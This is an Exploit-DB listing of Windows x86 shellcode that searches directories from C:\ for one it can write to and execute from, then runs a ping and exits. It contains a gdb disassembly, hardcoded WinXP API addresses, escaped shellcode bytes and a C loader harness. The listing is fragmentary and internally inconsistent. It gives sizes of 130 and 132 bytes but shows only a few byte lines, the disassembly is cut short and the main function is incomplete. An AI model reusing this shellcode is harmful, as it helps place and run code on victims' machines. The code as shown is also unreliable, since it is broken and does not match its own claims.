Windows x86 - Executable Directory Search Shellcode (130 bytes)

ID EDB-ID:41467
Type exploitdb
Reporter Exploit-DB
Modified 2017-02-26T00:00:00


Windows x86 - Executable Directory Search Shellcode (130 bytes). Shellcode exploit for Win_x86 platform

                                            # Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes

write & exec dir searcher
starts from C:\
If dir found then write, execute (ping and exit
If Write/noexec dir found then continue

Tested on WinXP SP1 (77e6fd35;77e798fd)
i686-w64-mingw32-gcc shell.c -o golddgger.exe

Null-free version:

(gdb) disassemble 
Dump of assembler code for function function:
=> 0x08048062 <+0>:	pop    ecx
   0x08048063 <+1>:	xor    eax,eax
   0x08048065 <+3>:	mov    BYTE PTR [ecx+0x64],al
   0x08048068 <+6>:	push   eax
   0x08048069 <+7>:	push   ecx
   0x0804806a <+8>:	mov    eax,0x77e6fd35
   0x0804806f <+13>:	call   eax
   0x08048071 <+15>:	xor    eax,eax
   0x08048073 <+17>:	push   eax
   0x08048074 <+18>:	mov    eax,0x77e798fd
   0x08048079 <+23>:	call   eax

NULL-free shellcode (132 bytes):

"\x35\xfd\xe6\x77"                      // exec
"\xfd\x98\xe7\x77"                      // exit
"\x63\x3a\x5c"                          // C:\
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  //

// NULL version (130 bytes):

char code[] = 
"\x35\xfd\xe6\x77"                 	// exec
"\xfd\x98\xe7\x77"                  	// exit
"\x63\x3a\x5c"                      	// C:\
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"	// 

int main(int argc, char **argv)

        int (*func)();
        func = (int (*)()) code;